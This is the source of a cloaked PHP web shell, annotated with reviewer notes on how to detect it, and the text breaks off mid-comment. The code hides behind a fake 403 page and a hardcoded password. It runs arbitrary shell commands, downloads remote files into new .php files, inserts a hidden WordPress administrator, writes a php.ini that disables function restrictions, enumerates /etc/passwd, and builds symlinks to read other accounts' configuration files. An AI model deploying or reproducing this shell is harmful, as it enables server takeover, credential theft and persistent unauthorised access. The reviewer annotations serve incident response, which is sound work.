.
<?php
// Entry point of a password-protected web shell. Error reporting and error
// display are both switched off first, so a failure in this script produces
// no visible PHP error in the response.
error_reporting(0);
ini_set('display_errors', 0);
date_default_timezone_set('UTC');
// HIDDEN SHELL ACCESS - Only accessible via ?Xcr00t parameter
// Cloaking gate: only the PRESENCE of the `Xcr00t` query parameter is tested
// (its value is ignored). Without it the script sends a 403 status, prints the
// static decoy page that follows and exits, so an ordinary visitor or crawler
// sees what looks like a denial page.
// NOTE(review): detection leads visible here are the literal parameter name in
// access-log query strings and a 403 body that is generated by a PHP file
// instead of by the web server itself.
if (!isset($_GET['Xcr00t'])) {
// Show 403 Forbidden page
header('HTTP/1.0 403 Forbidden');
?>
<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>403 Forbidden </title>
<style>
* {
margin: 0; padding: 0; box-sizing: border-box;
font-family: 'Poppins', sans-serif;
}
body {
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
background: radial-gradient(circle at top, #0a0014, #120022, #1a002f);
color: #fff;
overflow: hidden;
text-align: center;
animation: bgflow 10s ease infinite;
}
@keyframes bgflow {
0% { background-position: 0% 50%; }
50% { background-position: 100% 50%; }
100% { background-position: 0% 50%; }
}
.container {
background: rgba(30, 0, 50, 0.6);
border: 1px solid rgba(200, 0, 255, 0.3);
border-radius: 20px;
padding: 50px;
max-width: 600px;
box-shadow: 0 0 25px rgba(150, 0, 255, 0.4);
backdrop-filter: blur(15px);
animation: fadeIn 1.2s ease;
}
@keyframes fadeIn {
from { opacity: 0; transform: scale(0.95); }
to { opacity: 1; transform: scale(1); }
}
.lock {
font-size: 90px;
color: #b100ff;
text-shadow: 0 0 25px #b100ff, 0 0 50px #7f00ff;
animation: pulse 2.5s infinite ease-in-out;
}
@keyframes pulse {
0% { transform: scale(1); opacity: 1; }
50% { transform: scale(1.08); opacity: 0.8; }
100% { transform: scale(1); opacity: 1; }
}
h1 {
font-size: 6rem;
margin: 10px 0;
background: linear-gradient(90deg, #b100ff, #ff00ff, #7f00ff);
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
text-shadow: 0 0 30px rgba(180, 0, 255, 0.5);
}
h2 {
font-size: 1.8rem;
font-weight: 300;
color: #c9a9ff;
margin-bottom: 20px;
}
.code {
display: inline-block;
background: rgba(100, 0, 150, 0.25);
border: 1px solid rgba(200, 0, 255, 0.4);
padding: 10px 25px;
border-radius: 50px;
color: #d09bff;
margin-bottom: 25px;
font-size: 1rem;
}
p {
font-size: 1.1rem;
line-height: 1.7;
color: #d3c3ff;
margin-bottom: 25px;
}
.actions {
display: flex;
justify-content: center;
gap: 15px;
flex-wrap: wrap;
}
.btn {
text-decoration: none;
padding: 12px 30px;
border-radius: 50px;
font-weight: 600;
transition: all 0.3s ease;
}
.btn-primary {
background: linear-gradient(90deg, #b100ff, #7f00ff);
color: #fff;
box-shadow: 0 0 20px rgba(150, 0, 255, 0.5);
}
.btn-secondary {
border: 1px solid rgba(255,255,255,0.3);
color: #c9a9ff;
background: transparent;
}
.btn:hover {
transform: translateY(-3px);
box-shadow: 0 0 25px rgba(190, 0, 255, 0.5);
}
footer {
position: absolute;
bottom: 15px;
width: 100%;
text-align: center;
font-size: 0.85rem;
color: rgba(255,255,255,0.4);
}
footer span {
color: #b100ff;
font-weight: 600;
}
@media (max-width: 768px) {
.container { padding: 30px 20px; }
h1 { font-size: 4rem; }
.actions { flex-direction: column; }
}
</style>
</head>
<body>
<div class="container">
<div class="lock">🔒</div>
<h1>403</h1>
<h2>Akses Dilarang</h2>
<div class="code">Error 403: Forbidden</div>
<p>Kamu tidak memiliki izin untuk mengakses halaman ini.<br>
Jika kamu yakin ini kesalahan, hubungi administrator sistem.</p>
<div class="actions">
<a href="/" class="btn btn-primary">🏠 Ke Halaman Utama</a>
<a href="javascript:history.back()" class="btn btn-secondary">⬅️ Kembali</a>
</div>
</div>
</body>
</html>
<?php
exit;
}
// SansXploit SHELL - Authentication Required
// Second gate, reached only when the `Xcr00t` parameter was present: a shared
// password checked against a literal stored in this file, with the result
// remembered in the PHP session.
session_start();
$auth_password = 'BabyXcr00t'; // password goes here (kept in clear text in the file)
// Anyone whose session does not already carry authenticated === true is either
// logged in (correct POSTed password) or shown the login form below.
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
if (isset($_POST['password']) && $_POST['password'] === $auth_password) {
$_SESSION['authenticated'] = true;
// Redirect back to this script with the gate parameter re-attached.
header('Location: ' . $_SERVER['PHP_SELF'] . '?Xcr00t');
exit;
}
// Login form
// NOTE(review): the password literal above and the page title / banner strings
// in the form markup are fixed text, which makes them usable as static
// indicators when scanning a web root for this file.
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Xcr00toname x SansXploit</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
background:
radial-gradient(circle at 20% 80%, rgba(120, 0, 255, 0.1) 0%, transparent 50%),
radial-gradient(circle at 80% 20%, rgba(200, 0, 255, 0.1) 0%, transparent 50%),
radial-gradient(circle at 40% 40%, rgba(100, 0, 200, 0.05) 0%, transparent 50%),
linear-gradient(135deg, #0a0a0a 0%, #120929 50%, #0a0615 100%);
color: #e6e6ff;
font-family: 'Rajdhani', 'Courier New', monospace;
min-height: 100vh;
overflow: hidden;
position: relative;
}
/* NEURAL NETWORK BACKGROUND */
.neural-network {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
z-index: 0;
}
/* CYBER GRID */
.cyber-grid {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
background:
linear-gradient(90deg, transparent 95%, rgba(138, 43, 226, 0.03) 100%),
linear-gradient(0deg, transparent 95%, rgba(138, 43, 226, 0.03) 100%);
background-size: 50px 50px;
z-index: 1;
}
/* MAIN CONTAINER */
.quantum-terminal {
position: relative;
z-index: 10;
max-width: 800px;
margin: 50px auto;
background: rgba(10, 5, 25, 0.7);
border: 1px solid rgba(138, 43, 226, 0.3);
border-radius: 20px;
backdrop-filter: blur(15px);
box-shadow:
0 0 100px rgba(138, 43, 226, 0.2),
inset 0 0 50px rgba(138, 43, 226, 0.1);
overflow: hidden;
}
/* TERMINAL HEADER */
.terminal-header {
background: linear-gradient(90deg, rgba(138, 43, 226, 0.2), rgba(148, 0, 211, 0.2));
padding: 20px 30px;
border-bottom: 1px solid rgba(138, 43, 226, 0.3);
position: relative;
}
.header-glow {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: linear-gradient(90deg,
transparent,
rgba(138, 43, 226, 0.1),
transparent);
animation: headerScan 3s linear infinite;
}
@keyframes headerScan {
0% { transform: translateX(-100%); }
100% { transform: translateX(100%); }
}
.title-main {
font-size: 2.8em;
font-weight: 700;
background: linear-gradient(45deg, #da70d6, #8a2be2, #4b0082);
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
text-shadow: 0 0 30px rgba(138, 43, 226, 0.5);
letter-spacing: 3px;
text-transform: uppercase;
}
.title-sub {
font-size: 1.1em;
color: #c9a0ff;
margin-top: 5px;
letter-spacing: 8px;
font-weight: 300;
}
/* ACCESS PANEL */
.access-panel {
padding: 60px 40px;
text-align: center;
}
.security-level {
display: inline-block;
background: rgba(138, 43, 226, 0.2);
border: 1px solid #8a2be2;
padding: 10px 20px;
border-radius: 25px;
margin-bottom: 40px;
font-size: 0.9em;
color: #da70d6;
letter-spacing: 2px;
}
.password-container {
position: relative;
margin: 40px 0;
}
.password-input {
background: rgba(20, 10, 40, 0.6);
border: 2px solid #8a2be2;
border-radius: 15px;
padding: 25px 30px;
width: 100%;
max-width: 500px;
font-size: 18px;
color: #e6ccff;
font-family: 'Courier New', monospace;
letter-spacing: 3px;
transition: all 0.3s ease;
outline: none;
}
.password-input:focus {
box-shadow:
0 0 40px rgba(138, 43, 226, 0.4),
inset 0 0 20px rgba(138, 43, 226, 0.1);
border-color: #da70d6;
transform: scale(1.02);
}
.input-glow {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
border-radius: 15px;
background: linear-gradient(45deg,
transparent,
rgba(138, 43, 226, 0.1),
transparent);
animation: inputPulse 2s ease-in-out infinite;
pointer-events: none;
}
@keyframes inputPulse {
0%, 100% { opacity: 0.3; }
50% { opacity: 0.7; }
}
/* QUANTUM BUTTON */
.quantum-button {
background: linear-gradient(135deg, #8a2be2, #9400d3, #4b0082);
border: none;
border-radius: 15px;
padding: 20px 50px;
font-size: 18px;
font-weight: 600;
color: white;
cursor: pointer;
transition: all 0.3s ease;
position: relative;
overflow: hidden;
text-transform: uppercase;
letter-spacing: 2px;
margin-top: 20px;
}
.quantum-button::before {
content: '';
position: absolute;
top: -50%;
left: -50%;
width: 200%;
height: 200%;
background: linear-gradient(45deg,
transparent,
rgba(255,255,255,0.1),
transparent);
transform: rotate(45deg);
transition: all 0.6s ease;
}
.quantum-button:hover::before {
transform: rotate(45deg) translate(50%, 50%);
}
.quantum-button:hover {
transform: translateY(-5px);
box-shadow:
0 15px 30px rgba(138, 43, 226, 0.4),
0 5px 15px rgba(138, 43, 226, 0.3);
}
/* STATUS INDICATOR */
.status-indicator {
display: flex;
align-items: center;
justify-content: center;
margin-top: 30px;
gap: 15px;
}
.status-dot {
width: 12px;
height: 12px;
border-radius: 50%;
background: #8a2be2;
animation: statusPulse 1.5s ease-in-out infinite;
}
.status-dot:nth-child(2) { animation-delay: 0.5s; }
.status-dot:nth-child(3) { animation-delay: 1s; }
@keyframes statusPulse {
0%, 100% {
opacity: 0.3;
transform: scale(0.8);
}
50% {
opacity: 1;
transform: scale(1.2);
box-shadow: 0 0 20px #8a2be2;
}
}
/* ERROR MESSAGE */
.quantum-error {
color: #ff6b6b;
margin-top: 25px;
font-size: 16px;
text-shadow: 0 0 10px rgba(255, 107, 107, 0.5);
animation: quantumError 0.6s ease-out;
background: rgba(255, 107, 107, 0.1);
padding: 15px;
border-radius: 10px;
border: 1px solid rgba(255, 107, 107, 0.3);
}
@keyframes quantumError {
0% {
transform: translateY(-20px);
opacity: 0;
}
100% {
transform: translateY(0);
opacity: 1;
}
}
/* FOOTER */
.terminal-footer {
background: rgba(10, 5, 25, 0.8);
padding: 20px;
border-top: 1px solid rgba(138, 43, 226, 0.2);
text-align: center;
font-size: 0.9em;
color: #9370db;
letter-spacing: 1px;
}
.footer-text {
display: flex;
justify-content: center;
gap: 30px;
flex-wrap: wrap;
}
/* RESPONSIVE */
@media (max-width: 768px) {
.quantum-terminal {
margin: 20px;
border-radius: 15px;
}
.title-main {
font-size: 2em;
}
.access-panel {
padding: 40px 20px;
}
.password-input {
padding: 20px;
font-size: 16px;
}
}
</style>
</head>
<body>
<!-- NEURAL NETWORK BACKGROUND -->
<canvas class="neural-network" id="neuralNetwork"></canvas>
<div class="cyber-grid"></div>
<!-- QUANTUM TERMINAL -->
<div class="quantum-terminal">
<!-- TERMINAL HEADER -->
<div class="terminal-header">
<div class="header-glow"></div>
<div class="title-main"> HaxorNoName x SansXploit</div>
<div class="title-sub">Pencuri Dilarang Masuk</div>
</div>
<!-- ACCESS PANEL -->
<div class="access-panel">
<div class="security-level">
Welcome To Hidden Shell
</div>
<form method="post">
<div class="password-container">
<input type="password" name="password" class="password-input"
placeholder="ENTER QUANTUM KEY..." required>
<div class="input-glow"></div>
</div>
<button type="submit" class="quantum-button">
Press To Login
</button>
</form>
<?php if (isset($_POST['password'])): ?>
<div class="quantum-error">
⚠️ KEY REJECTED - ACCESS DENIED
</div>
<?php endif; ?>
<!-- STATUS INDICATOR -->
<div class="status-indicator">
<div class="status-dot"></div>
<div class="status-dot"></div>
<div class="status-dot"></div>
</div>
</div>
<!-- TERMINAL FOOTER -->
<div class="terminal-footer">
<div class="footer-text">
<span>Xcr00toname x SansXploit</span>
<span>No System Is Safe</span>
</div>
</div>
</div>
<script>
// NEURAL NETWORK ANIMATION
const canvas = document.getElementById('neuralNetwork');
const ctx = canvas.getContext('2d');
function resizeCanvas() {
canvas.width = window.innerWidth;
canvas.height = window.innerHeight;
}
resizeCanvas();
window.addEventListener('resize', resizeCanvas);
class Node {
constructor(x, y) {
this.x = x;
this.y = y;
this.vx = (Math.random() - 0.5) * 0.5;
this.vy = (Math.random() - 0.5) * 0.5;
this.radius = Math.random() * 2 + 1;
}
update() {
this.x += this.vx;
this.y += this.vy;
if (this.x < 0 || this.x > canvas.width) this.vx *= -1;
if (this.y < 0 || this.y > canvas.height) this.vy *= -1;
}
draw() {
ctx.beginPath();
ctx.arc(this.x, this.y, this.radius, 0, Math.PI * 2);
ctx.fillStyle = `rgba(138, 43, 226, ${0.3 + Math.random() * 0.2})`;
ctx.fill();
}
}
class Connection {
constructor(node1, node2) {
this.node1 = node1;
this.node2 = node2;
this.length = Math.hypot(node1.x - node2.x, node1.y - node2.y);
}
draw() {
const dx = this.node1.x - this.node2.x;
const dy = this.node1.y - this.node2.y;
const distance = Math.sqrt(dx * dx + dy * dy);
if (distance < 200) {
ctx.beginPath();
ctx.moveTo(this.node1.x, this.node1.y);
ctx.lineTo(this.node2.x, this.node2.y);
ctx.strokeStyle = `rgba(138, 43, 226, ${0.1 * (1 - distance / 200)})`;
ctx.lineWidth = 0.5;
ctx.stroke();
}
}
}
const nodes = [];
const connections = [];
// Create nodes
for (let i = 0; i < 50; i++) {
nodes.push(new Node(
Math.random() * canvas.width,
Math.random() * canvas.height
));
}
// Create connections
for (let i = 0; i < nodes.length; i++) {
for (let j = i + 1; j < nodes.length; j++) {
connections.push(new Connection(nodes[i], nodes[j]));
}
}
function animate() {
ctx.fillStyle = 'rgba(10, 5, 25, 0.05)';
ctx.fillRect(0, 0, canvas.width, canvas.height);
nodes.forEach(node => {
node.update();
node.draw();
});
connections.forEach(connection => {
connection.draw();
});
requestAnimationFrame(animate);
}
animate();
// Add typing effect to password placeholder
const passwordInput = document.querySelector('.password-input');
const originalPlaceholder = 'ENTER PASS KEY...';
let placeholderText = '';
let charIndex = 0;
let isDeleting = false;
function typePlaceholder() {
if (isDeleting) {
placeholderText = originalPlaceholder.substring(0, placeholderText.length - 1);
} else {
placeholderText = originalPlaceholder.substring(0, placeholderText.length + 1);
}
passwordInput.placeholder = placeholderText + '█';
if (!isDeleting && placeholderText === originalPlaceholder) {
setTimeout(() => isDeleting = true, 1000);
} else if (isDeleting && placeholderText === '') {
isDeleting = false;
setTimeout(typePlaceholder, 500);
return;
}
setTimeout(typePlaceholder, isDeleting ? 50 : 100);
}
// Start typing effect when page loads
setTimeout(typePlaceholder, 1000);
</script>
</body>
</html>
<?php
exit;
}
// Prints a full-screen overlay containing one alert box.
//   $message  text shown to the operator; HTML-escaped with htmlspecialchars().
//   $type     suffix of the `alert-` CSS class; concatenated into the markup
//             WITHOUT escaping. The two callers visible in this part of the
//             file pass no $type at all, so it defaults to 'danger'.
// Returns nothing; the markup is written directly to the response with echo.
function show_notification($message, $type = 'danger') {
echo '<div class="notification-overlay" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.7); z-index: 9999; display: flex; justify-content: center; align-items: center;">
<div class="alert alert-' . $type . ' notification-box" style="max-width: 500px; width: 90%;">
<button type="button" class="btn-close float-end" onclick="this.parentElement.parentElement.remove()"></button>
<p class="text-center mb-0">' . htmlspecialchars($message) . '</p>
</div>
</div>';
}
// Downloads the resource at $url into a newly named .php file inside $path.
// Returns the generated file name on success, false when both download
// methods fail.
// NOTE(review): what this leaves behind for a responder: a file whose name
// starts with `aurora_` followed by a uniqid() value and `.php`, and (on the
// first path) a `wget` child process started by the web-server account.
function create_403bp($url, $path) {
// File name is `aurora_` + uniqid(more_entropy) + `.php`.
$randname = uniqid('aurora_', true) . '.php';
$target = $path . DIRECTORY_SEPARATOR . $randname;
// Try wget first
// The URL and target are only wrapped in single quotes inside the command
// string; warnings from exec() are silenced with @.
$wget_cmd = "wget '{$url}' -O '{$target}' 2>&1";
@exec($wget_cmd, $output, $return_var);
if ($return_var === 0 && file_exists($target)) {
return $randname;
}
// Try curl if wget fails
$ch = curl_init($url);
$fp = fopen($target, 'w+');
if ($ch && $fp) {
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// Certificate and host-name verification are both turned off, so the
// transfer is not authenticated.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
if (curl_exec($ch)) {
fclose($fp);
curl_close($ch);
return $randname;
}
fclose($fp);
curl_close($ch);
}
return false;
}
// Fixed identity strings of the tool. Being literals, they can serve as
// static indicators in a content scan.
const APP_NAME = 'HaxorNoName x SansXploit';
const APP_VERSION = '3';
// Use of this limit is not visible in this part of the file.
const SCAN_READ_LIMIT = 5000;
$current_version = '3';
// Environment pre-flight: stop with a plain-text message when the PHP version
// or one of the listed extensions is missing.
if (version_compare(PHP_VERSION, '5.4.0', '<')) {
die('PHP version 5.4 or higher required');
}
$required_extensions = ['mysqli', 'curl', 'json'];
foreach ($required_extensions as $ext) {
if (!extension_loaded($ext)) {
die("Required PHP extension '{$ext}' is not loaded");
}
}
header('Content-Type: text/html; charset=UTF-8');
// ini_get() returns the raw setting string (for example a value with a unit
// suffix); it is compared to the integer 256 as-is before the limit is set.
if (ini_get('memory_limit') < 256) {
@ini_set('memory_limit', '256M');
}
// Error callback in the set_error_handler() signature.
//   $errno    PHP error level constant of the raised error
//   $errstr   error message
//   $errfile  file in which the error was raised
//   $errline  line on which the error was raised
// Returns false when the level is masked out by error_reporting(), so the
// caller falls back to PHP's own handling; otherwise writes one line to the
// error log and returns true. Fatal-class levels terminate the request with a
// generic message after logging.
function customErrorHandler($errno, $errstr, $errfile, $errline) {
    $enabled = error_reporting() & $errno;
    if (!$enabled) {
        return false;
    }

    $fatalLevels = [E_ERROR, E_CORE_ERROR, E_COMPILE_ERROR, E_PARSE];
    $warningLevels = [E_WARNING, E_CORE_WARNING, E_COMPILE_WARNING, E_USER_WARNING];
    $noticeLevels = [E_NOTICE, E_USER_NOTICE];

    // Loose membership tests mirror the loose comparison of a switch statement.
    $isFatal = in_array($errno, $fatalLevels);
    if ($isFatal) {
        $error_type = 'Fatal Error';
    } elseif (in_array($errno, $warningLevels)) {
        $error_type = 'Warning';
    } elseif (in_array($errno, $noticeLevels)) {
        $error_type = 'Notice';
    } else {
        $error_type = 'Unknown';
    }

    error_log("PHP {$error_type}: {$errstr} in {$errfile} on line {$errline}");

    if ($isFatal) {
        die("A critical error occurred. Please check the error logs.");
    }
    return true;
}
// Route PHP errors through customErrorHandler from here on.
set_error_handler("customErrorHandler");
// The script refuses to run unless both its own directory and the system temp
// directory are writable; the die() message discloses the failing path.
// NOTE(review): a web root that the PHP process cannot write to makes this
// check fail, which is one reason to keep application directories read-only
// for the web-server account.
$required_paths = [__DIR__, sys_get_temp_dir()];
foreach ($required_paths as $path) {
if (!is_writable($path)) {
die("Directory not writable: {$path}");
}
}
// Starts a session only when none exists and headers are still unsent.
if (!isset($_SESSION) && !headers_sent()) {
session_start();
}
// Per-request runtime limits and realpath cache settings.
ini_set('max_execution_time', 30);
ini_set('memory_limit', '256M');
ini_set('realpath_cache_size', '4096k');
ini_set('realpath_cache_ttl', 600);
// Stub: takes no arguments, does nothing and returns no value.
function checkUpdate() {
return;
}
// Relative directory name in which the symlink helpers below create their
// links. NOTE(review): a directory with this exact name under a web root is a
// static indicator.
const SYMLINK_DIR = 'AuroraSym';
// Use of this constant is not visible in this part of the file.
const PERL_DIR = 'perl';
// Formats a byte count as a human-readable size such as "1.5 KB".
//   $bytes  numeric size in bytes
// Returns the value scaled by powers of 1024 (at most up to TB), rounded to
// two decimals and followed by the unit. Results are memoised per input for
// the lifetime of the request.
function fmtSize($bytes) {
    static $types = ['B', 'KB', 'MB', 'GB', 'TB'];
    static $cache = [];

    $cacheKey = (string)$bytes;
    if (!isset($cache[$cacheKey])) {
        $unit = 0;
        // Stop at index 4 so the unit never runs past 'TB'.
        while ($bytes >= 1024 && $unit < 4) {
            $bytes /= 1024;
            $unit++;
        }
        $cache[$cacheKey] = round($bytes, 2) . ' ' . $types[$unit];
    }
    return $cache[$cacheKey];
}
// Returns the lower-cased extension of $file (text after the last dot of the
// final path component), or an empty string when there is none.
function ext($file)
{
    $suffix = pathinfo($file, PATHINFO_EXTENSION);
    return strtolower($suffix);
}
// Picks the icon markup shown next to a file name.
//   $file  file name as displayed
// Returns an <i> element string: a dedicated icon for `.htaccess`, one per
// known extension, a shared icon for common image types, and a generic file
// icon otherwise. The choice is memoised per file name.
function icon($file) {
    static $iconCache = [];
    static $icons = [
        'php' => '<i class="fa-brands fa-php text-indigo"></i>',
        'html' => '<i class="fa-brands fa-html5 text-danger"></i>',
        'css' => '<i class="fa-brands fa-css3 text-primary"></i>',
        'js' => '<i class="fa-brands fa-js text-warning"></i>',
        'py' => '<i class="fa-brands fa-python text-warning"></i>',
        '.htaccess' => '<i class="fa-solid fa-lock text-danger"></i>',
        'image' => '<i class="fa-regular fa-image text-success"></i>',
        'default' => '<i class="fa-solid fa-file text-muted"></i>'
    ];

    if (!isset($iconCache[$file])) {
        if ($file === '.htaccess') {
            $slot = '.htaccess';
        } else {
            $suffix = ext($file);
            if (isset($icons[$suffix])) {
                $slot = $suffix;
            } elseif (in_array($suffix, ['jpg', 'jpeg', 'png', 'gif', 'webp'])) {
                $slot = 'image';
            } else {
                $slot = 'default';
            }
        }
        $iconCache[$file] = $icons[$slot];
    }
    return $iconCache[$file];
}
// Base64-encodes $path so it can be carried in a query string.
function enc($path)
{
    $encoded = base64_encode($path);
    return $encoded;
}
// Reverses enc(): Base64-decodes $path (non-strict decoding) and returns the
// resulting string.
function dec($path)
{
    $decoded = base64_decode($path);
    return $decoded;
}
// Returns the last four octal digits of $file's mode as a string, e.g. "0644".
function perms($file)
{
    $octal = sprintf('%o', fileperms($file));
    return substr($octal, -4);
}
// Host fingerprinting helper: despite its name it only derives a
// "major.minor.patch" string from php_uname() and returns it.
// The third space-separated field of the uname string is taken as the kernel
// release, everything after the first '-' is dropped, and missing components
// default to '0'.
function suggest_exploit()
{
$uname = php_uname();
$parts = explode(" ", $uname);
$kernel = isset($parts[2]) ? $parts[2] : '0.0.0';
$version = explode("-", $kernel)[0];
$numbers = explode(".", $version);
$major = isset($numbers[0]) ? $numbers[0] : '0';
$minor = isset($numbers[1]) ? $numbers[1] : '0';
$patch = isset($numbers[2]) ? $numbers[2] : '0';
return "$major.$minor.$patch";
}
// Returns true when the kernel version string from suggest_exploit() starts
// with one of the listed "major.minor." prefixes, false otherwise.
// NOTE(review): the function name suggests a pre-check for a local
// privilege-escalation attempt; the code here only does a string-prefix match
// on the kernel version and inspects no package or binary. Its presence shows
// the tool's intent to move beyond the web-server account, so a host where
// this file was found should be reviewed for privilege escalation, not just
// for web-root changes.
function check_pwnkit_compatibility()
{
$kernel = suggest_exploit();
$compatible_versions = [
'2.6.', '3.0.', '3.1.', '3.2.', '3.3.', '3.4.', '3.5.', '3.6.',
'3.7.', '3.8.', '3.9.', '3.10.', '3.11.', '3.12.', '3.13.', '3.14.',
'3.15.', '3.16.', '3.17.', '3.18.', '3.19.', '4.0.', '4.1.', '4.2.',
'3.3.', '4.4.', '4.5.', '4.6.', '4.7.', '4.8.', '4.9.', '4.10.',
'4.11.', '4.12.', '4.13.', '4.14.', '4.15.', '4.16.', '4.17.', '4.18.',
'4.19.', '5.0.', '5.1.', '5.2.', '5.3.'
];
foreach ($compatible_versions as $version) {
if (strpos($kernel, $version) === 0) {
return true;
}
}
return false;
}
// Runs $command on the host through PHP's process-execution functions and
// returns its combined stdout/stderr as a string. On any failure the
// exception message is written to the error log and returned as
// "Error: <message>".
// NOTE(review): this is the shell's command-execution primitive. Defensive
// levers that bear directly on it are the `disable_functions` ini directive
// for exec/shell_exec/system and process monitoring for shells or tools
// started by the web-server account.
function cmd($command) {
try {
$output = '';
// Sanitize command input
// escapeshellcmd() is applied to the whole command string.
$command = escapeshellcmd($command);
// Check if command execution is allowed
if (ini_get('safe_mode') || !function_exists('exec')) {
throw new Exception('Command execution is disabled');
}
// Try different command execution methods
if (function_exists('exec')) {
// stderr is folded into stdout; a non-zero exit status is an error.
exec($command . ' 2>&1', $output_array, $return_var);
if ($return_var !== 0) {
throw new Exception("Command failed with code: {$return_var}");
}
$output = implode("\n", $output_array);
} elseif (function_exists('shell_exec')) {
$output = shell_exec($command . ' 2>&1');
if ($output === null) {
throw new Exception('Command execution failed');
}
} elseif (function_exists('system')) {
// system() prints directly, so its output is captured with a buffer.
ob_start();
system($command . ' 2>&1', $return_var);
$output = ob_get_clean();
if ($return_var !== 0) {
throw new Exception("Command failed with code: {$return_var}");
}
} else {
throw new Exception('No command execution function available');
}
return $output;
} catch (Exception $e) {
error_log("Command execution error: " . $e->getMessage());
return "Error: " . $e->getMessage();
}
}
// Connects to a MySQL database with the supplied credentials and attempts to
// insert a new row into `wp_users` plus two `wp_usermeta` rows
// (`wp_capabilities` with an administrator flag, `wp_user_level` = '10').
//   $dbHost, $dbUser, $dbPass, $dbName  database connection settings
//   $wpUser, $wpPass                    login name and password for the new row
// Returns true when the user insert executes, false on connection failure,
// insert failure or any caught Exception.
// NOTE(review): for incident response, the visible artefacts are a `wp_users`
// row with the e-mail literal used below and matching `wp_usermeta` rows for
// the same user id. The table names are fixed to the `wp_` prefix. After
// finding this file, audit administrator accounts and rotate the database
// credentials of every site the web-server account could read.
function addWordpressAdmin($dbHost, $dbUser, $dbPass, $dbName, $wpUser, $wpPass)
{
try {
$conn = new mysqli($dbHost, $dbUser, $dbPass, $dbName);
if ($conn->connect_error) return false;
$hashedPass = password_hash($wpPass, PASSWORD_DEFAULT);
$sql = "INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, display_name)
VALUES (?, ?, ?, ?, NOW(), ?)";
$stmt = $conn->prepare($sql);
$stmt->bind_param("sssss", $wpUser, $hashedPass, $wpUser, "admin@local.host", $wpUser);
if ($stmt->execute()) {
$userId = $stmt->insert_id;
$metaSql = "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)";
$capabilities = serialize(array('administrator' => true));
$metaStmt = $conn->prepare($metaSql);
$metaStmt->bind_param("iss", $userId, "wp_capabilities", $capabilities);
$metaStmt->execute();
$levelSql = "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, '10')";
$levelStmt = $conn->prepare($levelSql);
$levelStmt->bind_param("is", $userId, "wp_user_level");
$levelStmt->execute();
return true;
}
return false;
} catch (Exception $e) {
return false;
}
}
// Writes a `php.ini` file containing `disable_functions=none` into this
// script's own directory and returns true when the write succeeded.
// NOTE(review): whether PHP honours a php.ini dropped next to a script depends
// on the SAPI and server configuration, which is not visible here. An
// unexpected php.ini inside a web root is worth flagging either way.
function generatePhpIni()
{
return file_put_contents(__DIR__ . DIRECTORY_SEPARATOR . 'php.ini', "disable_functions=none\n") !== false;
}
// Prepares the SYMLINK_DIR directory used by the symlink helpers: creates it
// when missing and drops an .htaccess file that turns on FollowSymLinks and
// directory indexes and allows access from everyone.
// NOTE(review): these rules only take effect where the server lets .htaccess
// override `Options` and access control. A server configuration that does not
// permit those overrides blunts this step (confirm against the actual vhost
// config).
function initSymlinkContainer()
{
// Created with mode 0777 here; tightened to 0755 further down.
if (!is_dir(SYMLINK_DIR)) mkdir(SYMLINK_DIR, 0777, true);
$hta = SYMLINK_DIR . DIRECTORY_SEPARATOR . '.htaccess';
if (!file_exists($hta)) {
$rules = "Options +FollowSymLinks +Indexes\nOrder Allow,Deny\nAllow from all\nRequire all granted\n";
file_put_contents($hta, $rules);
}
// Ensure proper permissions
chmod(SYMLINK_DIR, 0755);
if (file_exists($hta)) {
chmod($hta, 0644);
}
}
// Creates the symbolic link SYMLINK_DIR/$alias pointing at $src.
//   $src    path the link should point to
//   $alias  link name inside SYMLINK_DIR
// Returns true when the link was created or something already exists at that
// name; returns false (after showing a notification) when symlink() is
// unavailable or the call fails. Warnings from symlink() are silenced with @.
function createSymlink($src, $alias)
{
if (!function_exists('symlink')) {
show_notification('Symlink function is not enabled on this server');
return false;
}
$target = SYMLINK_DIR . DIRECTORY_SEPARATOR . $alias;
// file_exists() follows links, so this tests the link's destination.
if (!file_exists($target)) {
if (!@symlink($src, $target)) {
show_notification('Failed to create symlink. Check permissions.');
return false;
}
return true;
}
return true;
}
// Convenience wrapper: makes sure the symlink directory exists, then creates a
// single link $alias -> $src in it. The result of createSymlink() is not
// returned to the caller.
function manualSymlink($src, $alias)
{
initSymlinkContainer();
createSymlink($src, $alias);
}
// Reads /etc/passwd (when it exists and is readable) and returns the unique
// login names whose numeric UID is 500 or higher.
// NOTE(review): this is local account enumeration from the web-server
// context. On shared hosting the result is the list of other tenants.
function extractSystemUsers()
{
$users = [];
$passwdFile = '/etc/passwd';
if (file_exists($passwdFile) && is_readable($passwdFile)) {
foreach (file($passwdFile) as $line) {
// passwd fields are colon-separated: name is field 0, UID is field 2.
$cols = explode(':', $line);
if (count($cols) >= 3) {
$name = $cols[0];
$uid = (int)$cols[2];
if ($uid >= 500) $users[] = $name;
}
}
}
return array_unique($users);
}
// For every name in $usernames, creates one symlink per entry of the table
// below inside SYMLINK_DIR. Each link points at "/home/<user><path>" and is
// named "<user>..<label>". A link named `root` pointing at "/" is also created
// when absent.
//   $usernames  iterable of account names; entries are trimmed and empty
//               ones skipped
// Returns nothing.
// NOTE(review): the table lists configuration-file locations of common web
// applications, i.e. files that normally hold database credentials. Combined
// with the .htaccess written by initSymlinkContainer() the purpose is to read
// other accounts' configuration through the web server. Relevant hardening on
